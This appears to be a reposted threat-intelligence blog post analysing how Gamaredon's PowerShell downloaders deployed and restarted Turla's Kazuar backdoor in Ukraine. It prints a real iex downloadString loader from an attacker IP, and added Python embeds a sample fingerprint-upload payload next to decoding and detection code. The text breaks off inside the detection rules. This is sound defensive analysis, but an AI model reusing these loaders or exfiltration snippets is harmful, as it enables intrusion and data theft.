{"id":241,"date":"2026-03-19T19:03:01","date_gmt":"2026-03-19T19:03:01","guid":{"rendered":"https:\/\/escudodigital.uy\/index.php\/2026\/03\/19\/gamaredon-x-turla-collab\/"},"modified":"2026-03-19T19:03:01","modified_gmt":"2026-03-19T19:03:01","slug":"gamaredon-x-turla-collab","status":"publish","type":"post","link":"https:\/\/escudodigital.uy\/index.php\/2026\/03\/19\/gamaredon-x-turla-collab\/","title":{"rendered":"Gamaredon X Turla collab"},"content":{"rendered":"<div>\n<p>In this blogpost, we uncover the first known cases of collaboration between Gamaredon and Turla in Ukraine.<\/p>\n<blockquote>\n<p><strong>Key points of this blogpost:<\/strong><\/p>\n<ul>\n<li>In February 2025, we discovered that the Gamaredon tool PteroGraphin was used to restart Turla\u2019s Kazuar backdoor on a machine in Ukraine.<\/li>\n<li>In April and June 2025, we detected that Kazuar v2 was deployed using the Gamaredon tools PteroOdd and PteroPaste.<\/li>\n<li>These discoveries lead us to believe with high confidence that Gamaredon is collaborating with Turla.<\/li>\n<li>Turla\u2019s victim count is very low compared to the number of Gamaredon compromises, suggesting that Turla chooses only the most valuable machines.<\/li>\n<li>Both groups are affiliated with the FSB, Russia\u2019s main domestic intelligence and security agency.<\/li>\n<\/ul>\n<\/blockquote>\n<h2>Threat actor profiles<\/h2>\n<h3>Gamaredon<\/h3>\n<p>Gamaredon has been active since at least 2013. It is responsible for many attacks, mostly against Ukrainian governmental institutions, as evidenced over time in <a href=\"https:\/\/www.rnbo.gov.ua\/en\/Diialnist\/4824.html\" target=\"_blank\" rel=\"noopener\">several reports<\/a> from <a href=\"https:\/\/cert.gov.ua\/article\/10702\" target=\"_blank\" rel=\"noopener\">CERT-UA<\/a> and from other official Ukrainian bodies. 
Gamaredon <a href=\"https:\/\/ssu.gov.ua\/en\/novyny\/sbu-vstanovyla-khakeriv-fsb-yaki-zdiisnyly-ponad-5-tys-kiberatak-na-derzhavni-orhany-ukrainy\" target=\"_blank\" rel=\"noopener\">has been attributed by the Security Service of Ukraine (SSU)<\/a> to the Center 18 of Information Security of the FSB, operating out of occupied Crimea. We believe this group to be collaborating with another threat actor that we discovered and named <a href=\"https:\/\/web-assets.esetstatic.com\/wls\/2020\/06\/ESET_InvisiMole.pdf\" target=\"_blank\" rel=\"noopener\">InvisiMole<\/a>.<\/p>\n<h3>Turla<\/h3>\n<p>Turla, also known as Snake, is an infamous cyberespionage group that has been active since at least 2004, possibly extending back into the late 1990s. It is thought to be part of the <a href=\"https:\/\/interaktiv.br.de\/elite-hacker-fsb\/en\/index.html\" target=\"_blank\" rel=\"noopener\">FSB<\/a>. It mainly focuses on high-profile targets, such as governments and diplomatic entities, in Europe, Central Asia, and the Middle East. It is known for having breached major organizations such as the US Department of Defense in 2008 and the Swiss defense company RUAG in 2014. During the past few years, we have documented a large part of Turla\u2019s arsenal on the WeLiveSecurity blog and in <a href=\"https:\/\/www.eset.com\/us\/business\/services\/threat-intelligence\/\" target=\"_blank\" rel=\"noopener\">private reports<\/a>.<\/p>\n<h2>Overview<\/h2>\n<p>In February 2025, via ESET telemetry, we detected four different Gamaredon-Turla co-compromises in Ukraine. 
On those machines, Gamaredon deployed a wide range of tools, including <a href=\"https:\/\/web-assets.esetstatic.com\/wls\/en\/papers\/white-papers\/gamaredon-in-2024.pdf\" target=\"_blank\" rel=\"noopener\">PteroLNK<\/a>, PteroStew, PteroOdd, PteroEffigy, and PteroGraphin, while Turla deployed only Kazuar v3.<\/p>\n<p>On one of those machines, we were able to capture a payload showing that Turla is able to issue commands via Gamaredon implants. PteroGraphin was used to restart Kazuar, possibly after Kazuar crashed or was not launched automatically. Thus, PteroGraphin was probably used as a recovery method by Turla. This is the first time that we have been able to link these two groups together via technical indicators (see <em><a href=\"#First chain: Restart of Kazuar v3\">First chain: Restart of Kazuar v3<\/a><\/em>).<\/p>\n<p>Because, in all four cases, the ESET endpoint product was installed after the compromises, we are unable to pinpoint the exact compromise method. However, Gamaredon is known for using spearphishing and malicious LNK files on removable drives (as explained in our recent blogpost), so we presume that one of these is the most likely compromise vector.<\/p>\n<p>In April and June 2025, we detected Kazuar v2 installers being deployed directly by Gamaredon tools (see <em><a href=\"#Second chain: Deployment of Kazuar v2 via PteroOdd\">Second chain: Deployment of Kazuar v2 via PteroOdd<\/a><\/em> and <em><a href=\"#Third chain: Deployment of Kazuar v2 via PteroPaste\">Third chain: Deployment of Kazuar v2 via PteroPaste<\/a><\/em>). This shows that Turla is actively collaborating with Gamaredon to gain access to specific machines in Ukraine.<\/p>\n<h2>Victimology<\/h2>\n<p>Over the past 18 months, we have detected Turla on seven machines in Ukraine. We believe that Gamaredon compromised the first four machines in January 2025, while Turla deployed Kazuar v3 in February 2025. 
In all cases, the ESET endpoint product was only installed after both compromises.<\/p>\n<p>It is worth noting that, prior to this, the last time we detected a Turla compromise in Ukraine was in February 2024.<\/p>\n<p>All those elements, and the fact that Gamaredon is compromising hundreds if not thousands of machines, suggest that Turla is interested only in specific machines, probably ones containing highly sensitive intelligence.<\/p>\n<h3>Attribution<\/h3>\n<h4>Gamaredon<\/h4>\n<p>In those compromises, we detected PteroLNK, PteroStew, and PteroGraphin, which we believe are exclusive to Gamaredon.<\/p>\n<h4>Turla<\/h4>\n<p>Similarly, for Turla, we detected the use of Kazuar v2 and Kazuar v3, which we believe are exclusive to that group.<\/p>\n<h3>Gamaredon-Turla collaboration hypotheses<\/h3>\n<p>In 2020, we showed that Gamaredon provided access to InvisiMole (see our <a href=\"https:\/\/web-assets.esetstatic.com\/wls\/2020\/06\/ESET_InvisiMole.pdf\">white paper<\/a>), so it is not the first time that Gamaredon has collaborated with another Russia-aligned threat actor.<\/p>\n<p>On the other hand, Turla is known for hijacking other threat actors\u2019 infrastructure to get an initial foothold in its targets\u2019 networks. 
Over the past years, several cases have been publicly documented:<\/p>\n<ul>\n<li>In 2019, Symantec published a <a href=\"https:\/\/www.security.com\/threat-intelligence\/waterbug-espionage-governments\">blogpost<\/a> showing that Turla hijacked OilRig (an Iran-aligned group) infrastructure to spy on a Middle Eastern target.<\/li>\n<li>In 2023, Mandiant published a <a href=\"https:\/\/cloud.google.com\/blog\/topics\/threat-intelligence\/turla-galaxy-opportunity\/\">blogpost<\/a> showing that Turla reregistered expired Andromeda C&amp;C domains in order to compromise targets in Ukraine.<\/li>\n<li>In 2024, Microsoft published two blogposts (<a href=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2024\/12\/04\/frequent-freeloader-part-i-secret-blizzard-compromising-storm-0156-infrastructure-for-espionage\/\">first<\/a> and <a href=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2024\/12\/11\/frequent-freeloader-part-ii-russian-actor-secret-blizzard-using-tools-of-other-groups-to-attack-ukraine\/\">second<\/a>) showing that Turla hijacked the cybercrime botnet Amadey and infrastructure of the cyberespionage group SideCopy (a Pakistan-aligned group) in order to deploy Kazuar.<\/li>\n<\/ul>\n<p>Note that both Gamaredon and Turla are part of the Russian Federal Security Service (FSB). Gamaredon is thought to be operated by officers of Center 18 of the FSB (aka the Center for Information Security) in Crimea (see <a href=\"https:\/\/ssu.gov.ua\/en\/novyny\/sbu-vstanovyla-khakeriv-fsb-yaki-zdiisnyly-ponad-5-tys-kiberatak-na-derzhavni-orhany-ukrainy\">this report<\/a> from the Security Service of Ukraine), which is part of the FSB\u2019s counterintelligence service. 
As for Turla, the <a href=\"https:\/\/www.gov.uk\/government\/publications\/russias-fsb-malign-cyber-activity-factsheet\/russias-fsb-malign-activity-factsheet\">UK\u2019s NCSC<\/a> attributes the group to the Center 16 of the FSB, which is Russia\u2019s main signals intelligence (SIGINT) agency.<\/p>\n<p>Therefore, we propose three hypotheses to explain our observations:<\/p>\n<ul>\n<li><strong>Very likely<\/strong>: Given that both groups are part of the Russian FSB (though in two different Centers), Gamaredon provided access to Turla operators so that they could issue commands on a specific machine to restart Kazuar, and deploy Kazuar v2 on some others.<\/li>\n<li><strong>Unlikely<\/strong>: Turla compromised Gamaredon infrastructure and leveraged this access to recover access on a machine in Ukraine. Since PteroGraphin contains a hardcoded token that allows modifying the C&amp;C pages, this possibility cannot be fully discarded. However, it implies that Turla was able to reproduce the full Gamaredon chain.<\/li>\n<li><strong>Unlikely<\/strong>: Gamaredon has access to Kazuar and deploys it on very specific machines. 
Given Gamaredon\u2019s noisy approach, we don\u2019t think it would be that careful deploying Kazuar on only a very limited set of victims.<\/li>\n<\/ul>\n<h3>Geopolitical context<\/h3>\n<p>From an organizational perspective, it is worth noting that the two entities commonly associated with Turla and Gamaredon have a long history of reported collaboration, which can be traced back to the Cold War era.<\/p>\n<p>The FSB\u2019s Center 16 (which is believed to harbor Turla) is <a href=\"https:\/\/cepa.org\/comprehensive-reports\/russian-cyberwarfare-unpacking-the-kremlins-capabilities\/\">a direct heir<\/a> to the KGB\u2019s 16<sup>th<\/sup> Directorate, which was mainly responsible for foreign SIGINT collection \u2013 the persistence of the number 16 is in fact regarded by observers as a sign of the FSB leadership\u2019s desire to emphasize <a href=\"https:\/\/checkfirst.network\/wp-content\/uploads\/2025\/07\/OSINT_Phaleristics_Unveiling_FSB_16th_Center_SIGINT_Capabilities.pdf\">a historical lineage<\/a>. Center 18 (which is generally associated with Gamaredon) maintains a rough affiliation with the KGB\u2019s 2<sup>nd<\/sup> Chief Directorate, which was responsible for internal security within the Soviet Union. During the Soviet era, both organizations frequently worked hand in hand, sharing responsibilities for <a href=\"https:\/\/irp.fas.org\/world\/russia\/riehle.pdf#page=239\">monitoring foreign embassies<\/a> on Russian soil for instance.<\/p>\n<p>Then and now, such collaborations reflect the Russian strategic culture and philosophy of a natural continuity between internal security and national defense. Although Center 16 is still tasked with foreign intelligence collection and Center 18 is theoretically part of the FSB\u2019s counterintelligence apparatus, both entities seem to maintain some mission overlaps \u2013 especially with regard to former Soviet republics. 
In 2018, the Security Service of Ukraine (SBU) had already observed Centers 16 and 18 apparently conducting <a href=\"https:\/\/go.crowdstrike.com\/rs\/281-OBQ-266\/images\/Report2019GlobalThreatReport.pdf\">a joint cyberespionage campaign<\/a> (named SpiceyHoney). The 2022 full-scale invasion of Ukraine has probably reinforced this convergence, with ESET data clearly showing Gamaredon and Turla activities focusing on the Ukrainian defense sector in recent months.<\/p>\n<p>Although the Russian intelligence community is known for its <a href=\"https:\/\/ecfr.eu\/publication\/putins_hydra_inside_russias_intelligence_services\/\">fierce internal rivalries<\/a>, there are indications that such tensions chiefly apply to interservice relations rather than to intra-agency interactions. In this context, it is perhaps not entirely surprising that APT groups operating within these two FSB Centers are observed cooperating to some extent.<\/p>\n<h2>First chain: Restart of Kazuar v3<a id=\"First chain: Restart of Kazuar v3\"\/><\/h2>\n<p>In February 2025, we detected the execution of Kazuar by PteroGraphin and PteroOdd on a machine in Ukraine. In this section we detail the exact chain that we detected.<\/p>\n<h3>Timeline<\/h3>\n<p>The overall timeline for this machine is the following:<\/p>\n<ul>\n<li>2025-01-20: Gamaredon deployed PteroGraphin on the machine. Note that the date is from the file creation timestamp provided by Windows, which could have been tampered with.<\/li>\n<li>2025-02-11: Turla deployed Kazuar v3 on the machine. 
Note that the date is from the file creation timestamp provided by Windows, which could have been tampered with.<\/li>\n<li>2025-02-27 15:47:39 UTC: PteroGraphin downloaded PteroOdd.<\/li>\n<li>2025-02-27 15:47:56 UTC: PteroOdd downloaded a payload, which executed Kazuar.<\/li>\n<li>2025-02-28 15:17:14 UTC: PteroOdd downloaded another payload, which also executed Kazuar.<\/li>\n<\/ul>\n<p>Hereafter, we assume these dates to be unaltered.<\/p>\n<h3>Details of the events<\/h3>\n<p>Since January 20<sup>th<\/sup>, 2025, PteroGraphin (see Figure 1) was present on the machine at <span style=\"font-family: courier new, courier, monospace;\">%APPDATA%\\x86.ps1<\/span>. It is a downloader that provides an encrypted channel for delivering payloads via <a href=\"https:\/\/telegra.ph\/\" target=\"_blank\" rel=\"noopener\">Telegra.ph<\/a>, a web service operated by Telegram that enables easy creation of web pages. Note that PteroGraphin contains a token to edit the Telegra.ph page, so anyone with knowledge of this token (Turla, for example, though unlikely) could manipulate the contents.<\/p>\n<figure class=\"image\"><img decoding=\"async\" title=\"Figure 1. PteroGraphin (token partially redacted)\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/09-25\/gamaredon-x-turla\/figure-1.jpeg\" alt=\"Figure 1. PteroGraphin (token partially redacted)\" width=\"\" height=\"\"\/><figcaption><em>Figure 1. PteroGraphin (token partially redacted)<\/em><\/figcaption><\/figure>\n<p>On February 27<sup>th<\/sup>, 2025, at 15:47:39 UTC, as shown in Figure 2, we detected a reply from <span style=\"font-family: courier new, courier, monospace;\">https:\/\/api.telegra[.]ph\/getPage\/SecurityHealthSystray-01-20?return_content=true<\/span>.<\/p>\n<figure class=\"image\"><img decoding=\"async\" title=\"Figure 2. Beautified JSON reply\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/09-25\/gamaredon-x-turla\/figure-2.png\" alt=\"Figure 2. 
Beautified JSON reply\" width=\"\" height=\"\"\/><figcaption><em>Figure 2. Beautified JSON reply<\/em><\/figcaption><\/figure>\n<p>The data in <span style=\"font-family: courier new, courier, monospace;\">children<\/span> can be decrypted using the hardcoded 3DES key and IV from the PteroGraphin script above, which gives:<\/p>\n<p><span style=\"font-family: courier new, courier, monospace;\">powershell -windowStyle hidden -EncodedCommand <base64-encoded_payload\/><\/span><\/p>\n<p>The decoded payload is another PowerShell downloader that we named PteroOdd, shown in Figure 3.<\/p>\n<figure class=\"image\"><img decoding=\"async\" title=\"Figure 3. PteroOdd\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/09-25\/gamaredon-x-turla\/figure-3.png\" alt=\"Figure 3. PteroOdd\" width=\"\" height=\"\"\/><figcaption><em>Figure 3. PteroOdd<\/em><\/figcaption><\/figure>\n<p>On February 27<sup>th<\/sup>, 2025 at 15:47:56 UTC, we detected a request to <span style=\"font-family: courier new, courier, monospace;\">https:\/\/api.telegra[.]ph\/getPage\/dinoasjdnl-02-27?return_content=true<\/span>; the reply\u00a0is shown in Figure 4. Note that the replies for PteroOdd are not encrypted.<\/p>\n<figure class=\"image\"><img decoding=\"async\" title=\"Figure 4. PteroOdd JSON reply (beautified and partially redacted)\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/09-25\/gamaredon-x-turla\/figure-4.png\" alt=\"Figure 4. PteroOdd JSON reply (beautified and partially redacted)\" width=\"\" height=\"\"\/><figcaption><em>Figure 4. PteroOdd JSON reply (beautified and partially redacted)<\/em><\/figcaption><\/figure>\n<p>The decoded command is shown in Figure 5.<\/p>\n<figure class=\"image\"><img decoding=\"async\" title=\"Figure 5. Decoded PowerShell command (username redacted)\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/09-25\/gamaredon-x-turla\/figure-5.png\" alt=\"Figure 5. 
Decoded PowerShell command (username redacted)\" width=\"\" height=\"\"\/><figcaption><em>Figure 5. Decoded PowerShell command (username redacted)<\/em><\/figcaption><\/figure>\n<p>The payload first uploads the victim\u2019s computer name and system drive\u2019s volume serial number to the Cloudflare worker subdomain <span style=\"font-family: courier new, courier, monospace;\">https:\/\/lucky-king-96d6.mopig92456.workers[.]dev<\/span>.<\/p>\n<p>What is most interesting is the last line:<\/p>\n<p><span style=\"font-family: courier new, courier, monospace;\">Start-Process -FilePath \"C:\\Users\\[redacted]\\AppData\\Local\\Programs\\Sony\\Audio\\Drivers\\vncutil64.exe\"<\/span><\/p>\n<p>This is the path to the host executable that is launched to run Kazuar via DLL side-loading. The ESET endpoint product detected a <span style=\"font-family: courier new, courier, monospace;\">KERNEL<\/span> Kazuar v3 payload (<span style=\"font-family: courier new, courier, monospace;\">agent_label<\/span> is <span style=\"font-family: courier new, courier, monospace;\">AGN-RR-01<\/span>) in memory, loaded from this process. It is not clear to us why Turla operators had to use PteroGraphin to launch Kazuar, but it is possible that Kazuar somehow stopped working after the ESET product installation and that they had to restart the implant. Note that we didn\u2019t see Gamaredon downloading Kazuar; it had been present on the system since February 11<sup>th<\/sup>, 2025, before the ESET product was installed.<\/p>\n<p>Then, on February 28<sup>th<\/sup>, 2025 at 15:17:14 UTC, we detected another similar PowerShell script, shown in Figure 6.<\/p>\n<figure class=\"image\"><img decoding=\"async\" title=\"Figure 6. Second PowerShell command executing Kazuar\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/09-25\/gamaredon-x-turla\/figure-6.png\" alt=\"Figure 6. Second PowerShell command executing Kazuar\" width=\"\" height=\"\"\/><figcaption><em>Figure 6. 
Second PowerShell command executing Kazuar<\/em><\/figcaption><\/figure>\n<p>The first lines and the Cloudflare worker subdomain are identical. It starts the same <span style=\"font-family: courier new, courier, monospace;\">vncutil64.exe<\/span> but also a second executable, <span style=\"font-family: courier new, courier, monospace;\">LaunchGFExperience.exe<\/span>, which side-loads <span style=\"font-family: courier new, courier, monospace;\">LaunchGFExperienceLOC.dll<\/span> \u2013 the Kazuar loader. We then detected in memory, in the <span style=\"font-family: courier new, courier, monospace;\">LaunchGFExperience.exe<\/span> process, another <span style=\"font-family: courier new, courier, monospace;\">KERNEL<\/span> Kazuar v3 payload (<span style=\"font-family: courier new, courier, monospace;\">agent_label<\/span> is <span style=\"font-family: courier new, courier, monospace;\">AGN-XX-01<\/span>). It is not clear why two different <span style=\"font-family: courier new, courier, monospace;\">KERNEL<\/span> Kazuar v3 payloads were present on the same machine.<\/p>\n<p>Finally, an HTTP POST request, with the list of running processes, was sent to <span style=\"font-family: courier new, courier, monospace;\">https:\/\/eset.ydns[.]eu\/post.php<\/span>. The Turla operators most likely wanted confirmation that Kazuar was successfully launched.<\/p>\n<p>On March 10<sup>th<\/sup>, 2025 at 07:05:32 UTC, we detected another sample of PteroOdd, which uses the C&amp;C URL <span style=\"font-family: courier new, courier, monospace;\">https:\/\/api.telegra[.]ph\/getPage\/canposgam-03-06?return_content=true<\/span>. 
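<\/p>\n<p>The replies above follow the Telegra.ph <span style=\"font-family: courier new, courier, monospace;\">getPage<\/span> format: a JSON document whose <span style=\"font-family: courier new, courier, monospace;\">result.content<\/span> is a tree of nodes, each either a string or an object with <span style=\"font-family: courier new, courier, monospace;\">tag<\/span>, <span style=\"font-family: courier new, courier, monospace;\">attrs<\/span> and <span style=\"font-family: courier new, courier, monospace;\">children<\/span>. The following Python is an added example, not ESET tooling and not part of the original post: it walks that tree, base64-decodes the page body, unwraps the <span style=\"font-family: courier new, courier, monospace;\">powershell -EncodedCommand<\/span> layer (UTF-16LE base64, the form the PteroGraphin reply decrypts to) and pulls out the URLs and the Start-Process target that an analyst would turn into indicators. It assumes the PteroOdd page body is plain base64 of the script (these replies are not encrypted); the PteroGraphin layer would additionally need 3DES decryption with the key and IV from the script, which is not reproduced here. The embedded reply, the <span style=\"font-family: courier new, courier, monospace;\">worker-example.invalid<\/span> host and the victim path are constructed for the example, not captured data.<\/p>\n
```python
"""Decoder for the Telegra.ph getPage channel used by the Gamaredon downloaders.

Added example, not ESET's tooling: it walks the node tree of a getPage reply,
base64-decodes the page body (assumed plain base64 for PteroOdd, whose replies
are not encrypted), unwraps any `powershell -EncodedCommand` layer (UTF-16LE
base64) and extracts URLs and Start-Process targets as indicators. The
PteroGraphin layer would first need 3DES decryption with the key/IV from the
script, which is not reproduced here.
"""
import base64
import json
import re

# Telegra.ph "Node" format: a string, or {"tag": ..., "attrs": {...}, "children": [...]}.
def collect_text(nodes):
    """Depth-first concatenation of every string node under `nodes`."""
    out = []
    for node in nodes:
        if isinstance(node, str):
            out.append(node)
        elif isinstance(node, dict):
            out.extend(collect_text(node.get("children", [])))
    return "".join(out)

# -e / -ec / -enc / -EncodedCommand followed by a base64 blob (PowerShell accepts any prefix).
ENCODED_CMD = re.compile(r"-e(?:n[a-z]*|c)?\s+([A-Za-z0-9+/=]{16,})", re.I)
URL_RE = re.compile(r"""https?://[^\s'"«»;)]+""", re.I)
START_PROC = re.compile(r"""Start-Process\s+-FilePath\s+["'«]?([^"'»\s]+)""", re.I)

def unwrap_encoded_command(script):
    """Replace each -EncodedCommand argument with its UTF-16LE plaintext, repeatedly."""
    def _plain(match):
        return base64.b64decode(match.group(1)).decode("utf-16-le")
    while ENCODED_CMD.search(script):          # a decoded layer may carry another one
        script = ENCODED_CMD.sub(_plain, script)
    return script

def decode_reply(reply_json):
    """Turn a getPage reply into (plaintext script, indicators)."""
    reply = json.loads(reply_json)
    if not reply.get("ok"):
        raise ValueError("getPage reply not ok")
    body = "".join(collect_text(reply["result"]["content"]).split())
    script = unwrap_encoded_command(base64.b64decode(body).decode("utf-8"))
    return script, {
        "urls": sorted(set(URL_RE.findall(script))),
        "start_process": START_PROC.findall(script),
    }

# Constructed sample, not a captured reply: the inner script mirrors what the post
# describes (host name + volume serial upload, then Start-Process of the side-loading host).
INNER = (
    "$id=$env:COMPUTERNAME+'_'+(Get-CimInstance Win32_LogicalDisk -Filter \"DeviceID='C:'\").VolumeSerialNumber;"
    "(New-Object Net.WebClient).UploadString('https://worker-example.invalid/',$id);"
    "Start-Process -FilePath 'C:\\Users\\victim\\AppData\\Local\\Programs\\Sony\\Audio\\Drivers\\vncutil64.exe'"
)
LAUNCHER = "powershell -windowStyle hidden -EncodedCommand " + base64.b64encode(INNER.encode("utf-16-le")).decode()
SAMPLE_REPLY = json.dumps({
    "ok": True,
    "result": {
        "path": "example-02-27",
        "title": "page",
        "content": [{"tag": "p", "children": [base64.b64encode(LAUNCHER.encode()).decode()]}],
    },
})

if __name__ == "__main__":
    plaintext, indicators = decode_reply(SAMPLE_REPLY)
    print(plaintext)
    print(indicators)
```
\n<p>Run stand-alone, the script prints the recovered PowerShell and the indicator dictionary. The decoder concatenates every string node before stripping whitespace because a page body is not guaranteed to arrive as a single child; on a real capture, the unwrapped text should be compared against the figures above before any indicator is acted on.<\/p>\n<p>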
This sample was detected on a different machine in Ukraine, on which Kazuar was also present.<\/p>\n<p>The decoded payload, shown in Figure 7, also uses <span style=\"font-family: courier new, courier, monospace;\">eset.ydns[.]eu<\/span>, while not interacting with any Turla sample.<\/p>\n<p>On the other hand, we noted that the downloaded payload uploads the following pieces of information to <span style=\"font-family: courier new, courier, monospace;\">https:\/\/eset.ydns[.]eu\/post.php<\/span>:<\/p>\n<p>However, we are not aware of any .NET tool that is currently being used by Gamaredon, while there are several of them used by Turla, including Kazuar. Thus, it is possible that these uploaded pieces of information are for Turla, and we assess with medium confidence that the domain <span style=\"font-family: courier new, courier, monospace;\">eset.ydns[.]eu<\/span> is controlled by Turla.<\/p>\n<figure class=\"image\"><img decoding=\"async\" title=\"Figure 7. PteroOdd sample\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/09-25\/gamaredon-x-turla\/figure-7.png\" alt=\"Figure 7. PteroOdd sample\" width=\"\" height=\"\"\/><figcaption><em>Figure 7. PteroOdd sample<\/em><\/figcaption><\/figure>\n<p>The additional base64-encoded PowerShell command is a new downloader that abuses <span style=\"font-family: courier new, courier, monospace;\">api.gofile[.]io<\/span>; we named it PteroEffigy.<\/p>\n<h3>Kazuar v3<\/h3>\n<p>Kazuar v3 is the latest branch of the Kazuar family, an advanced C# espionage implant that we believe has been used exclusively by Turla since it was first seen in 2016. Kazuar v2 and v3 are fundamentally the same malware family and share the same codebase. However, some major changes have been introduced.<\/p>\n<p>Kazuar v3 comprises around 35% more lines of C# than Kazuar v2 and introduces additional network transport methods: over web sockets and Exchange Web Services. 
Kazuar v3 can have one of three roles (<span style=\"font-family: courier new, courier, monospace;\">KERNEL<\/span>, <span style=\"font-family: courier new, courier, monospace;\">BRIDGE<\/span>, or <span style=\"font-family: courier new, courier, monospace;\">WORKER<\/span>), and malware functionalities are divided among those roles. For example, only <span style=\"font-family: courier new, courier, monospace;\">BRIDGE<\/span> communicates with the C&amp;C server.<\/p>\n<h2>Second chain: Deployment of Kazuar v2 via PteroOdd<a id=\"Second chain: Deployment of Kazuar v2 via PteroOdd\"\/><\/h2>\n<p>On one of the Ukrainian machines mentioned in the previous section, we detected another interesting compromise chain on April 18<sup>th<\/sup>, 2025.<\/p>\n<p>On April 18<sup>th<\/sup>, 2025 at 15:26:14 UTC, we detected a PteroOdd sample (a Gamaredon tool) downloading a payload from <span style=\"font-family: courier new, courier, monospace;\">https:\/\/api.telegra[.]ph\/getPage\/scrsskjqwlbw-02-28?return_content=true<\/span>. The downloaded script, shown in Figure 8, is similar to the payload described in the first chain, but contains an additional base64-encoded script, which is the PowerShell downloader PteroEffigy.<\/p>\n<figure class=\"image\"><img decoding=\"async\" title=\"Figure 8. Payload downloaded by PteroOdd\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/09-25\/gamaredon-x-turla\/figure-8-1.png\" alt=\"Figure 8. Payload downloaded by PteroOdd (1)\" width=\"\" height=\"\"\/><figcaption><em>Figure 8. 
Payload downloaded by PteroOdd<\/em><\/figcaption><\/figure>\n<p>This PowerShell payload downloads another payload from <span style=\"font-family: courier new, courier, monospace;\">https:\/\/eset.ydns[.]eu\/scrss.ps1<\/span> and executes it.<\/p>\n<p><span style=\"font-family: courier new, courier, monospace;\">scrss.ps1<\/span> turned out to be an installer for Turla\u2019s Kazuar v2, which was previously analyzed in detail by <a href=\"https:\/\/unit42.paloaltonetworks.com\/pensive-ursa-uses-upgraded-kazuar-backdoor\/\" target=\"_blank\" rel=\"noopener\">Unit42<\/a>. This shows that Gamaredon deployed Kazuar, most likely on behalf of Turla.<\/p>\n<p>The Kazuar <span style=\"font-family: courier new, courier, monospace;\">agent_label<\/span> is <span style=\"font-family: courier new, courier, monospace;\">AGN-AB-26<\/span> and the three C&amp;C servers are:<\/p>\n<ul>\n<li><span style=\"font-family: courier new, courier, monospace;\">https:\/\/abrargeospatial[.]ir\/wp-includes\/fonts\/wp-icons\/index.php<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">https:\/\/www.brannenburger-nagelfluh[.]de\/wp-includes\/style-engine\/css\/index.php<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">https:\/\/www.pizzeria-mercy[.]de\/wp-includes\/images\/media\/bar\/index.php<\/span><\/li>\n<\/ul>\n<p>It is worth noting that Turla keeps using compromised WordPress servers as C&amp;Cs for Kazuar.<\/p>\n<p>Interestingly, it seems that Kazuar v2 is still maintained in parallel to Kazuar v3. 
For example, the recent updates to the backdoor commands in Kazuar v3 are also included in this <span style=\"font-family: courier new, courier, monospace;\">AGN-AB-26<\/span> version.<\/p>\n<h2>Third chain: Deployment of Kazuar v2 via PteroPaste<a id=\"Third chain: Deployment of Kazuar v2 via PteroPaste\"\/><\/h2>\n<p>On June 5<sup>th<\/sup> and 6<sup>th<\/sup>, 2025, we detected Gamaredon deploying a Turla implant on two machines in Ukraine. In both cases, Gamaredon\u2019s PteroPaste was caught trying to execute the simple PowerShell script shown in Figure 9.<\/p>\n<figure class=\"image\"><img decoding=\"async\" title=\"Figure 9. PowerShell script executed by PteroPaste\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/09-25\/gamaredon-x-turla\/figure-9-1.png\" alt=\"Figure 9. PowerShell script executed by PteroPaste (1)\" width=\"\" height=\"\"\/><figcaption><em>Figure 9. PowerShell script executed by PteroPaste<\/em><\/figcaption><\/figure>\n<p>The base64-encoded string is the following downloader in PowerShell:<\/p>\n<p><span style=\"font-family: courier new, courier, monospace;\">[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};iex(New-Object Net.WebClient).downloadString('https:\/\/91.231.182[.]187\/ekrn.ps1');<\/span><\/p>\n<p>The first statement disables TLS certificate validation for the process, presumably because the server, reached by bare IP address, presents a certificate that would not otherwise validate; the second fetches <span style=\"font-family: courier new, courier, monospace;\">ekrn.ps1<\/span> and runs it in memory with Invoke-Expression, so nothing is written to disk at this stage.<\/p>\n<p>The downloaded script <span style=\"font-family: courier new, courier, monospace;\">ekrn.ps1<\/span> is very similar to <span style=\"font-family: courier new, courier, monospace;\">scrss.ps1<\/span> mentioned in the second chain. 
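<\/p>\n<p>Across the three chains, the downloaders share a small set of recognisable traits: TLS certificate validation switched off, Invoke-Expression of a downloadString() result fetched from a bare IP address, polling of <span style=\"font-family: courier new, courier, monospace;\">api.telegra.ph\/getPage<\/span>, a Cloudflare <span style=\"font-family: courier new, courier, monospace;\">workers.dev<\/span> host for the fingerprint upload, hidden-window <span style=\"font-family: courier new, courier, monospace;\">-EncodedCommand<\/span> launchers, and Start-Process of a side-loading host under <span style=\"font-family: courier new, courier, monospace;\">AppData\\Local\\Programs<\/span>. The following Python is an added example, not ESET detection logic and not part of the original post: it scores PowerShell ScriptBlock log entries against those traits. The log lines, host and user names, the 192.0.2.10 address and the rule weights are constructed for the demonstration.<\/p>\n
```python
"""Scoring rules for the PowerShell downloader tradecraft seen in the three chains.

Added example, not ESET's detection logic. Each rule is a regex applied to the
script text as it appears in PowerShell ScriptBlock logging (event 4104) or a
process command line; weights and the threshold are illustrative choices.
"""
import re

RULES = [
    # (name, pattern, weight)
    ("tls_validation_disabled",
     r"ServerCertificateValidationCallback\s*=\s*\{\s*\$true\s*\}", 3),
    ("iex_downloadstring",
     r"(?:\biex\b|Invoke-Expression).*\.downloadString\(", 3),
    ("https_to_bare_ip",
     r"https?://\d{1,3}(?:\.\d{1,3}){3}(?:[:/]|\b)", 2),
    ("telegraph_getpage",
     r"api\.telegra\.ph/getPage/", 2),
    ("cloudflare_worker",
     r"https?://[\w.-]+\.workers\.dev\b", 1),
    ("hidden_encoded_command",
     r"-w(?:indowstyle)?\s+hidden\b.*-e(?:n[a-z]*|c)?\s+[A-Za-z0-9+/=]{16,}", 3),
    ("start_process_user_programs",
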